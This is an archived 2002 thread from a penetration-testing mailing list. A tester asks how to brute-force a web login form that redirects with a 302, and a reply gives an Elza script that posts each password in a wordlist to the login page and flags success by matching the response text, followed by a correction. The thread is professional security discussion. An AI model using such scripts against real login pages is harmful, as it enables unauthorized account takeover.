RE: Password HTML form bruteforce

From: Greg (greg@hoobie.net)
Date: 04/20/02 

From: "Greg" <greg@hoobie.net>
To: "Greg" <greg@hoobie.net>, "joh ket" <johket@hotmail.com>, <pen-test@securityfocus.com>
Date: Sat, 20 Apr 2002 02:29:10 +0100

Whoops,

Always spot the mistakes after you send it. Dodgy coding.

the line :
 subst ACCOUNT = admin
should read as:
  subst USERSTRING = admin

also the line :
  print Positive Authentication with Login: ACCOUNT, Password: CURRPASS
should read as :
  print Positive Authentication with Login: USERSTRING, Password: PASSSTRING

regards

Greg

> -----Original Message-----
> From: Greg [mailto:greg@hoobie.net]
> Sent: 20 April 2002 02:05
> To: joh ket; pen-test@securityfocus.com
> Subject: RE: Password HTML form bruteforce
>
>
> I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if
> you ask me.
>
> Why don't you try Elza
> (http://online.securityfocus.com/tools/1127) with this script
> which is based on one found in the Elza docs. Obviously change
> the target url and username. This script will read each string
> from words.txt and submit each attempt checking for the
>
> var autoredir = on
> subst ACCOUNT = admin
>
> proc POSITIVEAUTH
> print Positive Authentication with Login: ACCOUNT,
> Password: CURRPASS
> endproc POSITIVEAUTH
>
> proc ATTEMPTAUTH
> field userid = USERSTRING
> field password = PASSSTRING
> # Add any other form fields that need to be sent here
> post url http://TargetAddress/Login.cfm
> call POSITIVEAUTH if body = Some warm glowing message
> about how you're logged in now.
> endproc ATTEMPTAUTH
>
> call ATTEMPTAUTH PASSSTRING % words.txt
>
> In the above script, if you set 'autoredir' to off you will not
> be automatically redirected by the 302 and the '%location%'
> variable will be made available to you for examination. It might
> be easier to just let Elza handle the redirection and then match
> some known test in the body of the successful authentication page
> as shown above.
>
> Read the docs for Elza, you'll need to build a list of scripts up
> before it become really useful.
>
> cheers
>
> Greg
>
>
> > -----Original Message-----
> > From: joh ket [mailto:johket@hotmail.com]
> > Sent: 18 April 2002 10:16
> > To: pen-test@securityfocus.com
> > Subject: Password HTML form bruteforce
> >
> >
> >
> >
> > Hi there,
> >
> > I am currently involved in a pen test on a website
> > which is using formbased authentication.
> >
> > I figured out that a account, named 'test' exists...
> > (...)
> >
> > Now I want to brute force this account, I am using
> > Brutus AET2 for this.
> >
> > But I do not know how to use the HTML response.
> >
> > Below the packet capture of a response of a login
> > which was succesfull:
> >
> > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> > (lines deleted)
> > <head><title>Document.Moved</title></head><body
> > ><h1>Object.Moved</h1>
> > This.document.may.be.found.<a.HREF="start.cfm?
> > cid=
> > (lines deleted)
> >
> > A capture of an unsuccessfull capture looks like this:
> >
> > HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> > login=Invalid password. Please try again
> > (lines deleted)
> > Document.Moved</title></head>.<body><h1>Object.
> > Moved</h1>This.document.may.be.found.<a.HREF="
> > original.cfm?login=Invalid password. Please try
> > again">here</a>
> >
> > So depending on the password I get redirected to a
> > page...
> >
> > How should the primary and the secondary repsonse
> > be configured?
> >
> > Or does somebody else have a better idea how to do
> > this?
> >
> > Thanks in advance!
> >
> > Joh Ket
> >
> >
> > ------------------------------------------------------------------
> > ----------
> > This list is provided by the SecurityFocus Security Intelligence
> > Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities
> > please see:
> > https://alerts.securityfocus.com/
> >

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • RE: XSS LAB DEMO IDEAS
    ... User registers, providing their account details, locations, etc. ... Subject: XSS LAB DEMO IDEAS ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • RE: Using ARP to map a network
    ... On a HUB there would be absolutely no reason to send out ARP replies, ... >> This list is provided by the SecurityFocus Security Intelligence ... For more information on SecurityFocus' SIA service which ... > automatically alerts you to the latest security vulnerabilities please see: ...
    (Pen-Test)
  • RE: SQL Injection - retrieving all rows
    ... If you can GET responses from a SQL database just invoke the ASP page many ... >> This list is provided by the SecurityFocus Security Intelligence ... For more information on SecurityFocus' SIA service which ... >automatically alerts you to the latest security vulnerabilities please see: ...
    (Pen-Test)
  • Re: Problems on the DOS-Prompt
    ... >Is there a list of all availible commands that can be used on nt and 2k ... >>> This list is provided by the SecurityFocus Security Intelligence ... For more information on SecurityFocus' SIA service which ... >>> automatically alerts you to the latest security vulnerabilities ...
    (Pen-Test)
  • Re: Problems on the DOS-Prompt
    ... Account, which is in most cases the Account in which the IIS prozess is ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)